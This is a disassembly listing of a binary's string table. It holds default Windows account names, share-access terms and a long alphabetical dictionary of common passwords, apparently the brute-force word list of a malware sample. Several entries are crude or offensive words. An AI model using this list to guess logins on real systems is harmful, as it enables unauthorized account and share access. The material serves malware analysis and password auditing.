dd offset aAdministrate_0 ; "Administrateur"
dd offset aAdministrator ; "Administrator"
dd offset aAl3x ; "Al3x"
dd offset aAlex ; "Alex"
dd offset aAlexander ; "Alexander"
dd offset aBoth ; "BOTH"
dd offset aCheck ; "CHECK"
dd offset aCht ; "CHT"
dd offset aChangeme ; "Changeme"
dd offset aDefault_0 ; "Default"
dd offset aDell ; "Dell"
dd offset aFiles ; "FILES"
dd offset aFull_0 ; "FULL"
dd offset aGast ; "Gast"
dd offset aGuest ; "Guest"
dd offset aInviter ; "Inviter"
dd offset aLocal ; "LOCAL"
dd offset aLogin ; "Login"
dd offset aM_1 ; "M$"
dd offset aMp ; "MP"
dd offset aMs ; "MS"
dd offset aMat ; "Mat"
dd offset aMatt ; "Matt"
dd offset aMatthew ; "Matthew"
dd offset aNd ; "ND"
dd offset aNilez ; "Nilez"
dd offset aOem ; "OEM"
dd offset aOwner_0 ; "Owner"
dd offset aPassword ; "Password"
dd offset aRage ; "RAGE"
dd offset aRead ; "READ"
dd offset aRoot_0 ; "ROOT"
dd offset off_4333B4
dd offset aRosco ; "Rosco"
dd offset aRoscop ; "RoscoP"
dd offset aRoscopcoltrane ; "RoscoPColtrane"
dd offset aRoss ; "Ross"
dd offset aServer_1 ; "SERVER"
dd offset aShare_0 ; "SHARE"
dd offset aSystem_0 ; "SYSTEM"
dd offset aStandard ; "Standard"
dd offset aTest ; "Test"
dd offset aUnknown ; "Unknown"
dd offset aUser_1 ; "User"
dd offset aWrite ; "WRITE"
dd offset aWindowsxp ; "WindowsXP"
dd offset aA_2 ; "a"
dd offset aAaa ; "aaa"
dd offset aAbc ; "abc"
dd offset aAbc123 ; "abc123"
dd offset aAbcd ; "abcd"
dd offset aAcademia ; "academia"
dd offset aAcademic ; "academic"
dd offset aAccept ; "accept"
dd offset aAccess ; "access"
dd offset aAccount ; "account"
dd offset aAccounting ; "accounting"
dd offset aAccounts ; "accounts"
dd offset aAction ; "action"
dd offset aAda ; "ada"
dd offset aAdam ; "adam"
dd offset aAdm ; "adm"
dd offset aAdmin123 ; "admin123"
dd offset aAdrian ; "adrian"
dd offset aAdrianna ; "adrianna"
dd offset aAdult ; "adult"
dd offset aAerobics ; "aerobics"
dd offset aAfro ; "afro"
dd offset aAids ; "aids"
dd offset aAirplane ; "airplane"
dd offset aAlaska ; "alaska"
dd offset aAlbany ; "albany"
dd offset aAlbatros ; "albatros"
dd offset aAlbatross ; "albatross"
dd offset aAlbert ; "albert"
dd offset aAlert ; "alert"
dd offset aAlexande ; "alexande"
dd offset aAlf ; "alf"
dd offset aAlgebra ; "algebra"
dd offset aAlias ; "alias"
dd offset aAliases ; "aliases"
dd offset aAlice ; "alice"
dd offset aAlicia ; "alicia"
dd offset aAlisa ; "alisa"
dd offset aAlison ; "alison"
dd offset aAllison ; "allison"
dd offset aAllow ; "allow"
dd offset aAlpha ; "alpha"
dd offset aAlphabet ; "alphabet"
dd offset aAma ; "ama"
dd offset aAmadeus ; "amadeus"
dd offset aAmanda ; "amanda"
dd offset aAmber ; "amber"
dd offset aAmerica ; "america"
dd offset aAmorphou ; "amorphou"
dd offset aAmorphous ; "amorphous"
dd offset aAmy ; "amy"
dd offset aAnal ; "anal"
dd offset aAnalog ; "analog"
dd offset aAnarchis ; "anarchis"
dd offset aAnarchy ; "anarchy"
dd offset aAnchor ; "anchor"
dd offset aAndrea ; "andrea"
dd offset aAndroid ; "android"
dd offset aAndromac ; "andromac"
dd offset aAndromache ; "andromache"
dd offset aAndy ; "andy"
dd offset aAnfo ; "anfo"
dd offset aAngela ; "angela"
dd offset aAngerine ; "angerine"
dd offset aAngie ; "angie"
dd offset aAnimal ; "animal"
dd offset aAnimals ; "animals"
dd offset aAnita ; "anita"
dd offset aAnn ; "ann"
dd offset aAnna ; "anna"
dd offset aAnne ; "anne"
dd offset aAnnette ; "annette"
dd offset aAnon ; "anon"
dd offset aAnonymou ; "anonymou"
dd offset aAnswer ; "answer"
dd offset aAnthrax ; "anthrax"
dd offset aAnthropo ; "anthropo"
dd offset aAnthropogenic ; "anthropogenic"
dd offset aAnvils ; "anvils"
dd offset aAnything ; "anything"
dd offset aApollo13 ; "apollo13"
dd offset aApril ; "april"
dd offset aAria ; "aria"
dd offset aAriadne ; "ariadne"
dd offset aArlene ; "arlene"
dd offset aArmy ; "army"
dd offset aArrow ; "arrow"
dd offset aArthur ; "arthur"
dd offset aArtist ; "artist"
dd offset aAsd ; "asd"
dd offset aAsdf ; "asdf"
dd offset aAsdfgh ; "asdfgh"
dd offset aAsian ; "asian"
dd offset aAsm ; "asm"
dd offset aAsshole ; "asshole"
dd offset aAthena ; "athena"
dd offset aAtmosphe ; "atmosphe"
dd offset aAtmosphere ; "atmosphere"
dd offset aAtom ; "atom"
dd offset aAttack ; "attack"
dd offset aAuthoriz ; "authoriz"
dd offset aAztecs ; "aztecs"
dd offset aAzure ; "azure"
dd offset aBabe ; "babe"
dd offset aBaby ; "baby"
dd offset aBacchus ; "bacchus"
dd offset aBackdoor ; "backdoor"
dd offset aBackup ; "backup"
dd offset aBadass ; "badass"
dd offset aBailey ; "bailey"
dd offset aBall ; "ball"
dd offset aBanana ; "banana"
dd offset aBananas ; "bananas"
dd offset aBandit ; "bandit"
dd offset aBank ; "bank"
dd offset aBanks ; "banks"
dd offset aBarbara ; "barbara"
dd offset aBarber ; "barber"
dd offset aBare ; "bare"
dd offset aBarf ; "barf"
dd offset aBaritone ; "baritone"
dd offset aBart ; "bart"
dd offset aBartman ; "bartman"
dd offset aBaseball ; "baseball"
dd offset aBasic ; "basic"
dd offset aBass ; "bass"
dd offset aBassoon ; "bassoon"
dd offset aBatch ; "batch"
dd offset aBatman ; "batman"
dd offset aBeach ; "beach"
dd offset aBeammeup ; "beammeup"
dd offset aBear ; "bear"
dd offset aBeast ; "beast"
dd offset aBeater ; "beater"
dd offset aBeauty ; "beauty"
dd offset aBeaver ; "beaver"
dd offset aBecky ; "becky"
dd offset aBeethove ; "beethove"
dd offset aBeethoven ; "beethoven"
dd offset aBegin ; "begin"
dd offset aBehead ; "behead"
dd offset aBell ; "bell"
dd offset aBeloved ; "beloved"
dd offset aBenz ; "benz"
dd offset aBeowulf ; "beowulf"
dd offset aBerkeley ; "berkeley"
dd offset aBerlin ; "berlin"
dd offset aBerliner ; "berliner"
dd offset aBeryl ; "beryl"
dd offset aBeta ; "beta"
dd offset aBeth ; "beth"
dd offset aBetsie ; "betsie"
dd offset aBetty ; "betty"
dd offset aBeverly ; "beverly"
dd offset aBible ; "bible"
dd offset aBicamera ; "bicamera"
dd offset aBicameral ; "bicameral"
dd offset aBigfoot ; "bigfoot"
dd offset aBill ; "bill"
dd offset aBilly ; "billy"
dd offset aBinary ; "binary"
dd offset aBios ; "bios"
dd offset aBird ; "bird"
dd offset aBishop ; "bishop"
dd offset aBitch ; "bitch"
dd offset aBitmap ; "bitmap"
dd offset aBitnet ; "bitnet"
dd offset aBla ; "bla"
dd offset aBlack ; "black"
dd offset aBlank ; "blank"
dd offset aBlonde ; "blonde"
dd offset aBlondie ; "blondie"
dd offset aBlood ; "blood"
dd offset aBloodaxe ; "bloodaxe"
dd offset aBlow ; "blow"
dd offset aBlowjob ; "blowjob"
dd offset aBlue ; "blue"
dd offset aBlues ; "blues"
dd offset aBoard ; "board"
dd offset aBob ; "bob"
dd offset aBomb ; "bomb"
dd offset aBoner ; "boner"
dd offset aBoob ; "boob"
dd offset aBoobs ; "boobs"
dd offset aBook ; "book"
dd offset aBorn ; "born"
dd offset aBoyscout ; "boyscout"
dd offset aBradley ; "bradley"
dd offset aBrandi ; "brandi"
dd offset aBrandy ; "brandy"
dd offset aBravo ; "bravo"
dd offset aBreak ; "break"
dd offset aBreast ; "breast"
dd offset aBrenda ; "brenda"
dd offset aBrian ; "brian"
dd offset aBridget ; "bridget"
dd offset aBroadway ; "broadway"
dd offset aBrothel ; "brothel"
dd offset aBruce ; "bruce"
dd offset aBrunette ; "brunette"
dd offset aBrute ; "brute"
dd offset aBrutefor ; "brutefor"
dd offset aBsd ; "bsd"
dd offset aBulls ; "bulls"
dd offset aBullshit ; "bullshit"
dd offset aBumbling ; "bumbling"
dd offset aBung ; "bung"
dd offset aBurgess ; "burgess"
dd offset aBurn ; "burn"
dd offset aButch ; "butch"
dd offset aButt ; "butt"
dd offset aButthead ; "butthead"
dd offset aCad ; "cad"
dd offset aCaliforn ; "californ"
dd offset aCamille ; "camille"
dd offset aCampanil ; "campanil"
dd offset aCampanile ; "campanile"
dd offset aCamping ; "camping"
dd offset aCandi ; "candi"
dd offset aCandy ; "candy"
dd offset aCantor ; "cantor"
dd offset aCapitol ; "capitol"
dd offset aCaptain ; "captain"
dd offset aCapture ; "capture"
dd offset aCard ; "card"
dd offset aCardinal ; "cardinal"
dd offset aCaren ; "caren"
dd offset aCarla ; "carla"
dd offset aCarmen ; "carmen"
dd offset aCarol ; "carol"
dd offset aCarole ; "carole"
dd offset aCarolina ; "carolina"
dd offset aCaroline ; "caroline"
dd offset aCarrie ; "carrie"
dd offset aCarson ; "carson"
dd offset aCascades ; "cascades"
dd offset aCash ; "cash"
dd offset aCastle ; "castle"
dd offset aCat ; "cat"
dd offset aCatherin ; "catherin"
dd offset aCatherine ; "catherine"
dd offset aCatholic ; "catholic"
dd offset aCathy ; "cathy"
dd offset aCave ; "cave"
dd offset aCayuga ; "cayuga"
dd offset aCecily ; "cecily"
dd offset aCelt ; "celt"
dd offset aCeltic ; "celtic"
dd offset aCeltics ; "celtics"
dd offset aCerulean ; "cerulean"
dd offset aChange ; "change"
dd offset aCharity ; "charity"
dd offset aCharles ; "charles"
dd offset aCharlie ; "charlie"
dd offset aCharming ; "charming"
dd offset aCharon ; "charon"
dd offset aChat_0 ; "chat"
dd offset aChem ; "chem"
dd offset aChemistr ; "chemistr"
dd offset aChemistry ; "chemistry"
dd offset aChess ; "chess"
dd offset aChester ; "chester"
dd offset aChip ; "chip"
dd offset aChris ; "chris"
dd offset aChristin ; "christin"
dd offset aChristina ; "christina"
dd offset aChristine ; "christine"
dd offset aChristy ; "christy"
dd offset aCigar ; "cigar"
dd offset aCigarett ; "cigarett"
dd offset aCindy ; "cindy"
dd offset aCisco ; "cisco"
dd offset aClass ; "class"
dd offset aClasses ; "classes"
dd offset aClassic ; "classic"
dd offset aClaudia ; "claudia"
dd offset aClaymore ; "claymore"
dd offset aCleavage ; "cleavage"
dd offset aClinton ; "clinton"
dd offset aCluster ; "cluster"
dd offset aClusters ; "clusters"
dd offset aCoast ; "coast"
dd offset aCocacola ; "cocacola"
dd offset aCocainco ; "cocainco"
dd offset aCock ; "cock"
dd offset aCode ; "code"
dd offset aCodename ; "codename"
dd offset aCodeword ; "codeword"
dd offset aCoffee ; "coffee"
dd offset aCoin ; "coin"
dd offset aCoke ; "coke"
dd offset aCola ; "cola"
dd offset aCold ; "cold"
dd offset aCollins ; "collins"
dd offset aColor ; "color"
dd offset aCombat ; "combat"
dd offset aComics ; "comics"
dd offset aCommit ; "commit"
dd offset aCommrade ; "commrade"
dd offset aCommrades ; "commrades"
dd offset aCompany ; "company"
dd offset aCompaq ; "compaq"
dd offset aComputer ; "computer"
dd offset aComputin ; "computin"
dd offset aComrade ; "comrade"
dd offset aComrades ; "comrades"
dd offset aCondo ; "condo"
dd offset aCondom ; "condom"
dd offset aConnect ; "connect"
dd offset aConnie ; "connie"
dd offset aConserva ; "conserva"
dd offset aConsole ; "console"
dd offset aContinue ; "continue"
dd offset aControl ; "control"
dd offset aCook ; "cook"
dd offset aCookbook ; "cookbook"
dd offset aCookie ; "cookie"
dd offset aCool ; "cool"
dd offset aCooper ; "cooper"
dd offset aCopper ; "copper"
dd offset aCops ; "cops"
dd offset aCopy ; "copy"
dd offset aCorneliu ; "corneliu"
dd offset aCornelius ; "cornelius"
dd offset aCorrect ; "correct"
dd offset aCounters ; "counters"
dd offset aCountry ; "country"
dd offset aCouscous ; "couscous"
dd offset aCowboy ; "cowboy"
dd offset aCrack ; "crack"
dd offset aCrackpot ; "crackpot"
dd offset aCrash ; "crash"
dd offset aCream ; "cream"
dd offset aCreate ; "create"
dd offset aCreation ; "creation"
dd offset aCreature ; "creature"
dd offset aCredit ; "credit"
dd offset aCreosote ; "creosote"
dd offset aCretin ; "cretin"
dd offset aCrime ; "crime"
dd offset aCriminal ; "criminal"
dd offset aCristina ; "cristina"
dd offset aCrystal ; "crystal"
dd offset aCshrc ; "cshrc"
dd offset aCtx ; "ctx"
dd offset aCunt ; "cunt"
dd offset aCustomer ; "customer"
dd offset aCyber ; "cyber"
dd offset aCyberpun ; "cyberpun"
dd offset aCyberspa ; "cyberspa"
dd offset aCynthia ; "cynthia"
dd offset aD00d ; "d00d"
dd offset aDaemon ; "daemon"
dd offset aDaisy ; "daisy"
dd offset aDana ; "dana"
dd offset aDancer ; "dancer"
dd offset aDaniel ; "daniel"
dd offset aDanielle ; "danielle"
dd offset aDanny ; "danny"
dd offset aDapper ; "dapper"
dd offset aDark ; "dark"
dd offset aDarkaven ; "darkaven"
dd offset aData ; "data"
dd offset aDatabase ; "database"
dd offset aDatabasepass ; "databasepass"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDave ; "dave"
dd offset aDawn ; "dawn"
dd offset aDb1 ; "db1"
dd offset aDb1234 ; "db1234"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDead ; "dead"
dd offset aDeath ; "death"
dd offset aDeathsta ; "deathsta"
dd offset aDeb ; "deb"
dd offset aDebbie ; "debbie"
dd offset aDeborah ; "deborah"
dd offset aDebug ; "debug"
dd offset aDecember ; "december"
dd offset aDeck ; "deck"
dd offset aDefoe ; "defoe"
dd offset aDelta ; "delta"
dd offset aDeluge ; "deluge"
dd offset aDemo ; "demo"
dd offset aDemocrat ; "democrat"
dd offset aDenise ; "denise"
dd offset aDennis ; "dennis"
dd offset aDesiree ; "desiree"
dd offset aDesk ; "desk"
dd offset aDesktop ; "desktop"
dd offset aDesperat ; "desperat"
dd offset aDesperate ; "desperate"
dd offset aDevelop ; "develop"
dd offset aDevice ; "device"
dd offset aDevil ; "devil"
dd offset aDial ; "dial"
dd offset aDiamond ; "diamond"
dd offset aDiana ; "diana"
dd offset aDiane ; "diane"
dd offset aDice ; "dice"
dd offset aDick ; "dick"
dd offset aDiehard ; "diehard"
dd offset aDiet ; "diet"
dd offset aDieter ; "dieter"
dd offset aDigital ; "digital"
dd offset aDinosaur ; "dinosaur"
dd offset aDipshit ; "dipshit"
dd offset aDirect ; "direct"
dd offset aDirector ; "director"
dd offset aDirty ; "dirty"
dd offset aDisc ; "disc"
dd offset aDiscipli ; "discipli"
dd offset aDisclose ; "disclose"
dd offset aDiscover ; "discover"
dd offset aDiscovery ; "discovery"
dd offset aDisk_0 ; "disk"
dd offset aDiskette ; "diskette"
dd offset aDisney ; "disney"
dd offset aDisplay ; "display"
dd offset aDoctor ; "doctor"
dd offset aDog ; "dog"
dd offset aDollar ; "dollar"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDonaldduck ; "donaldduck"
dd offset aDong ; "dong"
dd offset aDoom ; "doom"
dd offset aDoom2 ; "doom2"
dd offset aDoomii ; "doomii"
dd offset aDoomsday ; "doomsday"
dd offset aDoonesbu ; "doonesbu"
dd offset aDoor ; "door"
dd offset aDoors ; "doors"
dd offset aDope ; "dope"
dd offset aDos ; "dos"
dd offset aDownload ; "download"
dd offset aDragon ; "dragon"
dd offset aDrdoom ; "drdoom"
dd offset aDrive ; "drive"
dd offset aDrought ; "drought"
dd offset aDuck ; "duck"
dd offset aDud3 ; "dud3"
dd offset aDude ; "dude"
dd offset aDudette ; "dudette"
dd offset aDuelist ; "duelist"
dd offset aDuke ; "duke"
dd offset aDulce ; "dulce"
dd offset aDuncan ; "duncan"
dd offset aDungeon ; "dungeon"
dd offset aDyke ; "dyke"
dd offset aEager ; "eager"
dd offset aEagle ; "eagle"
dd offset aEarth ; "earth"
dd offset aEasier ; "easier"
dd offset aEasy ; "easy"
dd offset aEatme ; "eatme"
dd offset aEcho ; "echo"
dd offset aEddie ; "eddie"
dd offset aEdges ; "edges"
dd offset aEdinburg ; "edinburg"
dd offset aEdinburgh ; "edinburgh"
dd offset aEdit ; "edit"
dd offset aEdition ; "edition"
dd offset aEdu ; "edu"
dd offset aEducatio ; "educatio"
dd offset aEducation ; "education"
dd offset aEdwin ; "edwin"
dd offset aEdwina ; "edwina"
dd offset aEgghead ; "egghead"
dd offset aEiderdow ; "eiderdow"
dd offset aEiderdown ; "eiderdown"
dd offset aEileen ; "eileen"
dd offset aEinsiein ; "einsiein"
dd offset aEinstein ; "einstein"
dd offset aElaine ; "elaine"
dd offset aElanor ; "elanor"
dd offset aElectron ; "electron"
dd offset aElephant ; "elephant"
dd offset aElizabet ; "elizabet"
dd offset aElizabeth ; "elizabeth"
dd offset aEllen ; "ellen"
dd offset aEmail ; "email"
dd offset aEmerald ; "emerald"
dd offset aEmily ; "emily"
dd offset aEmmanuel ; "emmanuel"
dd offset aEnable ; "enable"
dd offset aEnemy ; "enemy"
dd offset aEngine ; "engine"
dd offset aEngineer ; "engineer"
dd offset aEngland ; "england"
dd offset aEnglish ; "english"
dd offset aEnter ; "enter"
dd offset aEnterpri ; "enterpri"
dd offset aEnterprise ; "enterprise"
dd offset aEnzyme ; "enzyme"
dd offset aErenity ; "erenity"
dd offset aEric ; "eric"
dd offset aErica ; "erica"
dd offset aErika ; "erika"
dd offset aErin ; "erin"
dd offset aErotic ; "erotic"
dd offset aErsatz ; "ersatz"
dd offset aEstablis ; "establis"
dd offset aEstablish ; "establish"
dd offset aEstate ; "estate"
dd offset aEternity ; "eternity"
dd offset aEuclid ; "euclid"
dd offset aEvelyn ; "evelyn"
dd offset aExchange ; "exchange"
dd offset aExchnge ; "exchnge"
dd offset aExpert ; "expert"
dd offset aExplode ; "explode"
dd offset aExplore ; "explore"
dd offset aExplorer ; "explorer"
dd offset aExplosiv ; "explosiv"
dd offset aExtensio ; "extensio"
dd offset aExtension ; "extension"
dd offset aFairway ; "fairway"
dd offset aFaith ; "faith"
dd offset aFalcon ; "falcon"
dd offset aFalse ; "false"
dd offset aFamily ; "family"
dd offset aFarad ; "farad"
dd offset aFaraday ; "faraday"
dd offset aFart ; "fart"
dd offset aFast ; "fast"
dd offset aFear ; "fear"
dd offset aFeds ; "feds"
dd offset aFelicia ; "felicia"
dd offset aFender ; "fender"
dd offset aFermat ; "fermat"
dd offset aFerrari ; "ferrari"
dd offset aFidelity ; "fidelity"
dd offset aField ; "field"
dd offset aFight ; "fight"
dd offset aFile ; "file"
dd offset aFinite ; "finite"
dd offset aFire ; "fire"
dd offset aFirewall ; "firewall"
dd offset aFish ; "fish"
dd offset aFishers ; "fishers"
dd offset aFlakes ; "flakes"
dd offset aFloat ; "float"
dd offset aFlorida ; "florida"
dd offset aFlower ; "flower"
dd offset aFlowers ; "flowers"
dd offset aFoobar ; "foobar"
dd offset aFood ; "food"
dd offset aFool ; "fool"
dd offset aFoolproo ; "foolproo"
dd offset aFoolproof ; "foolproof"
dd offset aFootball ; "football"
dd offset aForce ; "force"
dd offset aFord ; "ford"
dd offset aForesigh ; "foresigh"
dd offset aForesight ; "foresight"
dd offset aForever ; "forever"
dd offset aForm ; "form"
dd offset aFormat ; "format"
dd offset aFornicat ; "fornicat"
dd offset aForsythe ; "forsythe"
dd offset aFourier ; "fourier"
dd offset aFoxtrot ; "foxtrot"
dd offset aFrance ; "france"
dd offset aFrank ; "frank"
dd offset aFreak ; "freak"
dd offset aFred ; "fred"
dd offset aFreddy ; "freddy"
dd offset aFree ; "free"
dd offset aFreedom ; "freedom"
dd offset aFrench ; "french"
dd offset aFriday ; "friday"
dd offset aFriend ; "friend"
dd offset aFriends ; "friends"
dd offset aFrighten ; "frighten"
dd offset aFrog ; "frog"
dd offset aFryguy ; "fryguy"
dd offset aFubar ; "fubar"
dd offset aFuck ; "fuck"
dd offset aFucked ; "fucked"
dd offset aFucker ; "fucker"
dd offset aFucking ; "fucking"
dd offset aFuckme ; "fuckme"
dd offset aFuckyou ; "fuckyou"
dd offset aFudge ; "fudge"
dd offset aFun ; "fun"
dd offset aFunction ; "function"
dd offset aFungible ; "fungible"
dd offset aGabriel ; "gabriel"
dd offset aGames ; "games"
dd offset aGardner ; "gardner"
dd offset aGarfield ; "garfield"
dd offset aGateway ; "gateway"
dd offset aGatherin ; "gatherin"
dd offset aGatt ; "gatt"
dd offset aGauss ; "gauss"
dd offset aGeorge ; "george"
dd offset aGerm ; "germ"
dd offset aGertrude ; "gertrude"
dd offset aGhost ; "ghost"
dd offset aGibson ; "gibson"
dd offset aGigabyte ; "gigabyte"
dd offset aGina ; "gina"
dd offset aGinger ; "ginger"
dd offset aGirl ; "girl"
dd offset aGlacier ; "glacier"
dd offset aGlen ; "glen"
dd offset aGnu ; "gnu"
dd offset aGobo ; "gobo"
dd offset aGod ; "god"
dd offset aGodblessyou ; "godblessyou"
dd offset aGold ; "gold"
dd offset aGolden ; "golden"
dd offset aGolf ; "golf"
dd offset aGolfer ; "golfer"
dd offset aGood ; "good"
dd offset aGorgeous ; "gorgeous"
dd offset aGorges ; "gorges"
dd offset aGosling ; "gosling"
dd offset aGouge ; "gouge"
dd offset aGovermen ; "govermen"
dd offset aGrades ; "grades"
dd offset aGraham ; "graham"
dd offset aGrahm ; "grahm"
dd offset aGrand ; "grand"
dd offset aGrant ; "grant"
dd offset aGreat ; "great"
dd offset aGreen ; "green"
dd offset aGroup ; "group"
dd offset aGryphon ; "gryphon"
dd offset aGuardian ; "guardian"
dd offset aGucci ; "gucci"
dd offset aGuess ; "guess"
dd offset aGuessme ; "guessme"
dd offset aGuitar ; "guitar"
dd offset aGumption ; "gumption"
dd offset aGuntis ; "guntis"
dd offset aH4x0r1ng ; "h4x0r1ng"
dd offset aH4x0ring ; "h4x0ring"
dd offset aH4x1ng ; "h4x1ng"
dd offset aHack ; "hack"
dd offset aHacked ; "hacked"
dd offset aHacker ; "hacker"
dd offset aHagar ; "hagar"
dd offset aHair ; "hair"
dd offset aHal ; "hal"
dd offset aHallowee ; "hallowee"
dd offset aHamlet ; "hamlet"
dd offset aHamster ; "hamster"
dd offset aHandel ; "handel"
dd offset aHandily ; "handily"
dd offset aHandjob ; "handjob"
dd offset aHappenin ; "happenin"
dd offset aHappening ; "happening"
dd offset aHard ; "hard"
dd offset aHardcore ; "hardcore"
dd offset aHarddriv ; "harddriv"
dd offset aHarmony ; "harmony"
dd offset aHarold ; "harold"
dd offset aHarvey ; "harvey"
dd offset aHate ; "hate"
dd offset aHaven ; "haven"
dd offset aHawaii ; "hawaii"
dd offset aHax ; "hax"
dd offset aHax0r ; "hax0r"
dd offset aHaxing ; "haxing"
dd offset aHead ; "head"
dd offset aHeadbang ; "headbang"
dd offset aHeadoffice ; "headoffice"
dd offset aHeat ; "heat"
dd offset aHeathen ; "heathen"
dd offset aHeather ; "heather"
dd offset aHeaven ; "heaven"
dd offset aHebrides ; "hebrides"
dd offset aHeidi ; "heidi"
dd offset aHeinlein ; "heinlein"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aHelp ; "help"
dd offset aHerb ; "herb"
dd offset aHerbert ; "herbert"
dd offset aHero ; "hero"
dd offset aHeroin ; "heroin"
dd offset aHewlett ; "hewlett"
dd offset aHexadeci ; "hexadeci"
dd offset aHiawatha ; "hiawatha"
dd offset aHibernia ; "hibernia"
dd offset aHidden ; "hidden"
dd offset aHigh ; "high"
dd offset aHighland ; "highland"
dd offset aHitler ; "hitler"
dd offset aHits ; "hits"
dd offset aHo ; "ho"
dd offset aHole ; "hole"
dd offset aHolly ; "holly"
dd offset aHollywoo ; "hollywoo"
dd offset aHome ; "home"
dd offset aHomepage ; "homepage"
dd offset aHomer ; "homer"
dd offset aHomeuser ; "homeuser"
dd offset aHomework ; "homework"
dd offset aHoney ; "honey"
dd offset aHooker ; "hooker"
dd offset aHooters ; "hooters"
dd offset aHorny ; "horny"
dd offset aHorrible ; "horrible"
dd offset aHorror ; "horror"
dd offset aHorse ; "horse"
dd offset aHorus ; "horus"
dd offset aHost ; "host"
dd offset aHotdog ; "hotdog"
dd offset aHotel ; "hotel"
dd offset aHq ; "hq"
dd offset aHttp_0 ; "http"
dd offset aHunt ; "hunt"
dd offset aHunter ; "hunter"
dd offset aHutchins ; "hutchins"
dd offset aHydrogen ; "hydrogen"
dd offset aHyper ; "hyper"
dd offset aHypertxt ; "hypertxt"
dd offset aIan ; "ian"
dd offset aIbm ; "ibm"
dd offset aIcecream ; "icecream"
dd offset aIhavenopass ; "ihavenopass"
dd offset aIllumina ; "illumina"
dd offset aImage ; "image"
dd offset aImbrogli ; "imbrogli"
dd offset aImbroglio ; "imbroglio"
dd offset aImmortal ; "immortal"
dd offset aImperial ; "imperial"
dd offset aInclude ; "include"
dd offset aIndia ; "india"
dd offset aIndian ; "indian"
dd offset aIndiana ; "indiana"
dd offset aIndians ; "indians"
dd offset aIngres ; "ingres"
dd offset aIngress ; "ingress"
dd offset aIngrid ; "ingrid"
dd offset aInna ; "inna"
dd offset aInnocuou ; "innocuou"
dd offset aInnocuous ; "innocuous"
dd offset aInput ; "input"
dd offset aInside ; "inside"
dd offset aInteger ; "integer"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aInvent ; "invent"
dd offset aIrene ; "irene"
dd offset aIrishman ; "irishman"
dd offset aIrule ; "irule"
dd offset aIsis ; "isis"
dd offset aJackie ; "jackie"
dd offset aJail ; "jail"
dd offset aJane ; "jane"
dd offset aJanet ; "janet"
dd offset aJanice ; "janice"
dd offset aJanie ; "janie"
dd offset aJapan ; "japan"
dd offset aJasmin ; "jasmin"
dd offset aJava ; "java"
dd offset aJazz ; "jazz"
dd offset aJean ; "jean"
dd offset aJeanne ; "jeanne"
dd offset aJeff ; "jeff"
dd offset aJen ; "jen"
dd offset aJenni ; "jenni"
dd offset aJennifer ; "jennifer"
dd offset aJenny ; "jenny"
dd offset aJerry ; "jerry"
dd offset aJerusale ; "jerusale"
dd offset aJessica ; "jessica"
dd offset aJester ; "jester"
dd offset aJewelry ; "jewelry"
dd offset aJill ; "jill"
dd offset aJixian ; "jixian"
dd offset aJoan ; "joan"
dd offset aJoanne ; "joanne"
dd offset aJody ; "jody"
dd offset aJoe ; "joe"
dd offset aJohn ; "john"
dd offset aJohndoe ; "johndoe"
dd offset aJohnny ; "johnny"
dd offset aJoseph ; "joseph"
dd offset aJoshua ; "joshua"
dd offset aJournal ; "journal"
dd offset aJoy ; "joy"
dd offset aJoyce ; "joyce"
dd offset aJudith ; "judith"
dd offset aJudy ; "judy"
dd offset aJuggle ; "juggle"
dd offset aJuicy ; "juicy"
dd offset aJulia ; "julia"
dd offset aJulie ; "julie"
dd offset aJuliet ; "juliet"
dd offset aJune ; "june"
dd offset aJupiter ; "jupiter"
dd offset aKaka ; "kaka"
dd offset aKaren ; "karen"
dd offset aKarie ; "karie"
dd offset aKarina ; "karina"
dd offset aKatana ; "katana"
dd offset aKate ; "kate"
dd offset aKathleen ; "kathleen"
dd offset aKathrine ; "kathrine"
dd offset aKathy ; "kathy"
dd offset aKatie ; "katie"
dd offset aKatina ; "katina"
dd offset aKatrina ; "katrina"
dd offset aKelly ; "kelly"
dd offset aKeri ; "keri"
dd offset aKermit ; "kermit"
dd offset aKernel ; "kernel"
dd offset aKerri ; "kerri"
dd offset aKerrie ; "kerrie"
dd offset aKerry ; "kerry"
dd offset aKevin ; "kevin"
dd offset aKewl ; "kewl"
dd offset aKey ; "key"
dd offset aKeybord ; "keybord"
dd offset aKeyin ; "keyin"
dd offset aKeyword ; "keyword"
dd offset aKiddie ; "kiddie"
dd offset aKids ; "kids"
dd offset aKill ; "kill"
dd offset aKiller ; "killer"
dd offset aKillthem ; "killthem"
dd offset aKilo ; "kilo"
dd offset aKim ; "kim"
dd offset aKimberly ; "kimberly"
dd offset aKing ; "king"
dd offset aKirk ; "kirk"
dd offset aKirkland ; "kirkland"
dd offset aKiss ; "kiss"
dd offset aKissmyas ; "kissmyas"
dd offset aKitten ; "kitten"
dd offset aKlingon ; "klingon"
dd offset aKnife ; "knife"
dd offset aKnight ; "knight"
dd offset aKnightma ; "knightma"
dd offset aKnown ; "known"
dd offset aKrista ; "krista"
dd offset aKristen ; "kristen"
dd offset aKristi ; "kristi"
dd offset aKristie ; "kristie"
dd offset aKristin ; "kristin"
dd offset aKristine ; "kristine"
dd offset aKristy ; "kristy"
dd offset aL337 ; "l337"
dd offset aL33t ; "l33t"
dd offset aLadies ; "ladies"
dd offset aLadle ; "ladle"
dd offset aLakers ; "lakers"
dd offset aLambda ; "lambda"
dd offset aLaminati ; "laminati"
dd offset aLamination ; "lamination"
dd offset aLan ; "lan"
dd offset aLana ; "lana"
dd offset aLaptop ; "laptop"
dd offset aLara ; "lara"
dd offset aLarkin ; "larkin"
dd offset aLarry ; "larry"
dd offset aLaser ; "laser"
dd offset aLaura ; "laura"
dd offset aLava ; "lava"
dd offset aLazarus ; "lazarus"
dd offset aLazer ; "lazer"
dd offset aLeah ; "leah"
dd offset aLebesgue ; "lebesgue"
dd offset aLee ; "lee"
dd offset aLeet ; "leet"
dd offset aLeft ; "left"
dd offset aLeftwing ; "leftwing"
dd offset aLegal ; "legal"
dd offset aLeland ; "leland"
dd offset aLeroy ; "leroy"
dd offset aLesbian ; "lesbian"
dd offset aLeslie ; "leslie"
dd offset aLetmein ; "letmein"
dd offset aLewis ; "lewis"
dd offset aLexluthe ; "lexluthe"
dd offset aLiberal ; "liberal"
dd offset aLibrary ; "library"
dd offset aLick ; "lick"
dd offset aLicker ; "licker"
